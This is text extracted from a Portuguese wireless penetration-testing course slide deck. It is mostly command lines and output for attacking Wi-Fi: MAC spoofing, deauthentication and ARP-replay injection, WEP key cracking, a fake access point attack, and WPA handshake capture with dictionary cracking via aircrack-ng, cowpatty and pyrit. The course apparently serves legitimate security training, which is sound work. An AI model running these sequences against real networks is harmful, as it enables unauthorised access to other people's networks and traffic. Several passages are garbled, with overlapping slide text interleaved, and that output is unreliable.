Clavis Teste de Invasao Sem Fio EAD PDF

Teste
de Invasão em

Redes Sem Fio
Nelson Murilo
Clavis Segurança da Informação
$ whoami
•  Consultor Infosec
•  2 livros publicados
•  Pentester
•  Investigador Forense
•  Incident Handler
•  Instrutor e Palestrante
Contatos
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Modelo do Curso
•  Aulas ao vivo (on line)

•  Aulas gravadas para revisão
•  Ambientes para testes
•  Material complementar
•  Avaliação
Agenda
•  Introdução
•  Conceitos de redes Wi-Fi
•  Principais vulnerabilidades
•  Ferramentas atuais
•  Sondagem e mapeamento
•  Identificação do ambiente
•  Ataques
•  Finalizando
Introdução
•  Conceitos
•  Características
Redes sem fio
§  Wi-Fi
§  Bluetooth
§  Infravermelho
§  WiMax
§  RFID
§  Celular (GSM/TDMA/CDMA, etc.)
§  ZigBee (802.15.4)
§  UWB (802.15.3)
IEEE 802.11
Padrões atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurança
802.1x – Mecanismos de autenticação, uso em
redes cabeadas e sem fio
802.11n – Aumento da velocidade, 108Mb
nominais.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
wlan4 IEEE 802.11bgn ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth4 no wireless extensions.

Canais
Canais
Canais
Canais
Canais
$ iwlist wlan0 freq

wlan0 24 channels in total; available Channel 36 : 5.18 GHz
frequencies : Channel 40 : 5.2 GHz
Channel 01 : 2.412 GHz Channel 44 : 5.22 GHz

Ad-Hoc
Infraestrutura
Infraestrutura
((( Nome da rede )))

Infraestrutura
((( Nome da rede )))

Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Divulgação do nome da rede
# iwlist wlan0 scan | egrep "Address|ESSID"

[...]
Cell 05 -‐ Address: 7C:4F:B5:E4:CC:80
ESSID:"GVT-‐CC81"
Cell 06 -‐ Address: 00:07:40:4D:1A:5C
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 07 -‐ Address: 6C:2E:85:F3:0C:8B
ESSID:"GVT-‐0C87"


23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
00:07:40:4D:1A:5C
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|
802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui
Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0
18.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:

00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown)
Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA - Enterprise
RADIUS
WPA - Enterprise
/etc/password
/etc/raddb/users
Oracle/MySQL/etc
Cer_ficado Digital
RADIUS
Biometria
Conceitos iniciais
$ /sbin/ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:21:29:65:b8:45
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Modo promiscuo
# tcpdump -vv -c 3 -i wlan0

tcpdump: listening on wlan0, link-‐type EN10MB (Ethernet), capture size 65535
bytes
14:00:37.291962 IP (tos 0x0, hl 64, id 0, offset 0, flags [DF], proto ICMP (1), length
84)
192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64

14:00:37.292417 IP (tos 0x0, hl 64, id 8024, offset 0, flags [DF], proto UDP (17),
length 71)
192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-‐addr.arpa.
(43)

14:00:37.294831 IP (tos 0x0, hl 255, id 49706, offset 0, flags [none], proto ICMP
(1), length
84) air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64
3 packets captured
Modo promiscuo
# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-‐Associated Tx-‐Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryp_on key:off
Power Management:on
# iw wlan0 info

Interface wlan0
ifindex 32
type managed
Modo Monitor
# iwconfig wlan0 mode monitor

# iw dev wlan0 interface add mon0 type monitor

Modo Monitor
# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Tx-‐Power=20 dBm
Power Management:on
# iw mon0 info
Interface mon0
ifindex 35
type monitor

Modo monitor
# tcpdump -c 3 -i mon0 -vv

tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Seleção de canais
# iwconfig mon0 channel 11

# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.462
GHz Tx-‐Power=20 dBm
Power Management:on
Seleção de canais
# tcpdump -c 3 -i mon0 -vv

tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header),
capture size 65535 bytes
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
Identificação de APs
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca
BSSID STATION PWR Rate Lost Frames Probe
00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
B E N C C IPH E R A UT H ESSID
XQ B e a c on s # D a ta , # /s CH M
BSSID PWR R
7 5 1 1 e . O P N bsbca
0 :9 F -8 8 1 5 18 108 4
00:25:9C:36:A
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt

00-25-9C (hex) Cisco-Linksys, LLC
Análise do tráfego
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
Análise do tráfego
iwconfig wlan5 essid bsbca
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
Mac OSX
# ifconfig en0 ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Filtro de MAC
Wired Equivalent Privacy
•  Protocolo frágil
•  Quebra exige captura de grande número de pacotes (+5mil)
•  Ou por dicionário
•  Várias ferramentas disponíveis

CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06
00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS

/usr/local/etc/kismet.conf
logtypes=pcapdump,gpsxml,netxml,nehxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$ ls -‐lh Kismet*
-‐rw-‐r-‐-‐r-‐-‐ 1 root root 8.0M 2012-‐02-‐20 14:04 Kismet-‐20120220-‐13-‐47-‐37-‐1.pcapdump
hhp://blog.kismetwireless.net/
Suite formada de vários programas

•  Análise de tráfego
•  Quebra de chave WEP (vários _pos de ataques)
•  Injeção de pacotes
•  Quebra de chave WPA(2)-‐PSK usando dicionário
•  Criação de Access Point falso

Sequência comum

•  Airmon-‐ng: Coloca a interface em modo monitor
•  Airodump-‐ng: Visualização e captura de pacotes
•  Aircrack-‐ng: Quebra da chave WEP

# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

# airmon-ng
wlan5 Ralink RT2870/3070 rt2800usb -

[phy48]
# airmon-ng start wlan5
wlan2 Realtek RTL8187L rtl8187 - [phy51]

(monitor mode enabled on mon0)
# airmon-ng
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5


# airmon-ng start wlan5 11

Airodump-‐ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,

ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Airodump-‐ng
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 -1 3 9 LABVIRUS

Aircrack-‐ng
$ aircrack-ng labvirus-01.pcap

[00:00:05] Tested 633 keys (got 46103 IVs)

KB depth byte(vote)
0 2/ 4 14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
1 2/ 1 DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
2 1/ 3 82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
3 1/ 3 09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
4 51/ 4 A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
Decrypted correctly: 100%
Aireplay-‐ng
# aireplay-ng --test mon0

17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP
17:33:52 Trying directed probe requests...

17:33:52 00:25:9C:36:0A:EF - channel: 11 – LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Aireplay-‐ng
# aireplay-ng --arpreplay –h mac_cliente –e ESSID interface
# arp –an
#
in g - c 1 1 9 2 .1 68.11.1 4) b y te s of data.
#p .1 ) 5 6 (8
1 9 2 .1 68 .1 1 .1 (192.168.11 tt l= 2 5 5 ti m e = 5 4.9 ms
PING .11 .1 : icmp_seq=1
1 9 2 .1 6 8
64 bytes from
1 .1 p in g s ta ti s tics --- time 0ms
--- 192.168.1 % p a c k e t los s ,
tr a n s m it ted , 1 received, 0 7 3 / 0 .0 00 ms
p a c k ets 7 3 / 5 4 .9
1
g / m a x /m d e v = 54.973/54.9
rtt min/av
8 [ether] on wlan0
# arp –an 7 :4 0 :3 5 :a 1 :1
at 00:0
(192.168.11.1)
Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS

Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
BSSID
The interfaceSTATION PWR Rate doesn't
MAC (00:26:5A:74:15:28) Lost match
FramestheProbe
specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
00:07:40:4D:1A:5C
17:44:10 Waiting00:21:29:65:B8:45 -14 36LABVIRUS)
for beacon frame (ESSID: -54 1 on 128 LABVIRUS
channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
BSSID
The interfaceSTATION PWR Rate doesn't
MAC (00:26:5A:74:15:28) Lost match
FramestheProbe
specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
00:07:40:4D:1A:5C
17:44:10 CHWaiting 00:21:29:65:B8:45
11 ][ Elapsed: 48 sframe
for beacon -14 36LABVIRUS)
][ 2012-02-21
(ESSID: -54 ][1Decloak:
17:44 on 128 LABVIRUS
00:07:40:4D:1A:5C
channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP BSSID
requests inPWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got 00:07:40:4D:1A:5C -38packet.
a deauth/disassoc 100 Is 353 14438
the source MAC652 11 54 ?WEP WEP
associated LABVIRUS
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS

Aireplay-‐ng
# airmon-ng start wlan5 11


# airodump-ng -c 11 mon0
Aireplay-‐ng
•  Esperar uma nova conexão
•  Forçar uma desconexão

aireplay-ng --deauth 100 –h MAC_CLIENTE –e ESSID mon0
ivstools-‐ng
Aircrack-ng 1.1 r2076

KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)
Failed. Next try with 5000 IVs.

ivstools-‐ng

KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)
Failed. Next try with 10000 IVs.

ivstools-‐ng
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done

Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Read 551433 packets.
Written 30547 IVs.
Written 13092 IVs.
ivstools-‐ng
ivstools --merge *.ivs poucostotal.ivs

Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
ivstools-‐ng
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap

# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)

# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.251394
# airdecap-ng104us Clear-To-Send RA:c8:bc:c8:20:38:5c
-w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
16:24:29.251398
Total number0us Acknowledgment
of packets read RA:c8:bc:c8:20:38:5c
298278
16:24:29.251910
of WEP data packets RA:00:1c:b3:af:ae:1e
162412
16:24:29.259072
Total number90us Request-To-Send
of WPA data packets TA:c8:bc:c8:20:38:5c
0
16:24:29.259080 46us Clear-To-Send
Number of plaintext data packetsRA:c8:bc:c8:20:38:5c
0
16:24:29.259586 90us Request-To-Send
Number of decrypted WEP packets TA:c8:bc:c8:20:38:5c
108781
16:24:29.259594 46us Clear-To-Send
Number of corrupted WEP packetsRA:c8:bc:c8:20:38:5c
0
Number of decrypted WPA packets TA:c8:bc:c8:20:38:5c
0
16:24:29.251394
# airdecap-ng104us Clear-To-Send RA:c8:bc:c8:20:38:5c
-w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
16:24:29.251398
of packets read RA:c8:bc:c8:20:38:5c
298278
16:24:43.166932
16:24:29.251910 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
number0us Acknowledgment
Total 16:24:43.170518
of WEP data packets RA:00:1c:b3:af:ae:1e
162412
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:29.259072
Total number90us Request-To-Send
of WPA data packets TA:c8:bc:c8:20:38:5c
0
16:24:43.173590
16:24:29.259080 IP 192.168.11.1.1900
46us Clear-To-Send > 239.255.255.250.1900: UDP, length 327
RA:c8:bc:c8:20:38:5c
Number of plaintext
16:24:43.176662 data packets 0
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
Number of decrypted WEP packets TA:c8:bc:c8:20:38:5c
108781
16:24:43.181784
16:24:29.259594 IP 192.168.11.1.1900
46us Clear-To-Send > 239.255.255.250.1900: UDP, length 311
RA:c8:bc:c8:20:38:5c
Number of corrupted
16:24:43.187416 WEP packets 0
IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:29.396292
Number of 90us Request-To-Send
decrypted WPA packets TA:c8:bc:c8:20:38:5c
0
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
CH 11 ][ Elapsed: 4 s ][ 2012-‐02-‐27 21:14

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

2E:74:C2:BA:A5:8A -‐87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
00:25:9C:36:0A:EF -‐45 3 0 0 1 54 WPA2 CCMP PSK Homenet54


(not associated) 00:1B:77:7C:2C:A7 -‐86 0 -‐ 1 68 8 Notebook
(not associated) 00:21:29:65:B8:45 -‐47 0 -‐ 1 7 2 LABVIRUS
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59
00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W

00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal
(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W

# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0

09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS”
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.

# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )

Decrypted correctly: 100%

AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45
00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d

00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06
00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS
00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26

aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)

aircrack-ng labvirus_wpa-01.cap
Read 698 packets.
1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)
Choosing first network as target.
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
D -Lin k_ 74 :1 5: 28 EA PO L 131 Ke y (msg 1/4)
e ->
39965 377.079356 D-Link_50:2f:2 50 :2 f:2 e EA PO L 16 0 Ke y (m sg 2/4)
28 -> D -Lin k_
39968 377.086048 D-Link_74:15: :1 5: 28 EA PO L 18 7 Ke y (m sg 3/4)
e -> D-Lin k_ 74
39969 377.089080 D-Link_50:2f:2 50 :2 f:2 e EA PO L 13 6 Ke y (m sg 4/ 4)
97 1 37 7. 10 44 80 D-L in k_ 74 :1 5: 28 -> D-Link_
39
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Wai_ng for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63
ACKs]
ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
aircrack-ng dlink-01.cap
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Opening dlink-01.cap
Read 60093 packets.
1 00:1B:11:50:2F:2E dlink WPA (1 handshake)

time aircrack-ng –w popular_ptBR.dic dlink-01.cap

Aircrack-ng 1.1
[00:01:09] 88192 keys tested (1274.66 k/s)

KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[…]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s
Cowpatty
time genpmk –f popular.dic -d dlink234.pmk -s dlink
[…]
real 9m2.988s
user 9m2.468s
_me pyrit –I popular.dic -‐o dlink.pmk -‐e dlink passthrough
sys 0m0.414s
Pyrit 0.4.1-‐dev (svn r308) (C) 2008-‐2011 Lukas Lueg hhp://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Computed 109216 PMKs total; 1865 PMKs per secondd

real 1m20.753s
user 5m2.437s
sys 0m0.753s

Cowpatty
cowpahy –d dlinkpop.pmk -‐s dlink -‐r dlink-‐01.cap
cowpahy 4.6 -‐ WPA-‐PSK dic_onary ahack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Star_ng dic_onary ahack. Please be pa_ent.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48560
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mil08187

The PSK is ”pxxxxxxxxxxxxxxxxxx".

Pyrit
time pyrit -r dlink-01.cap –I t-br_popular.dic attack_passthrough

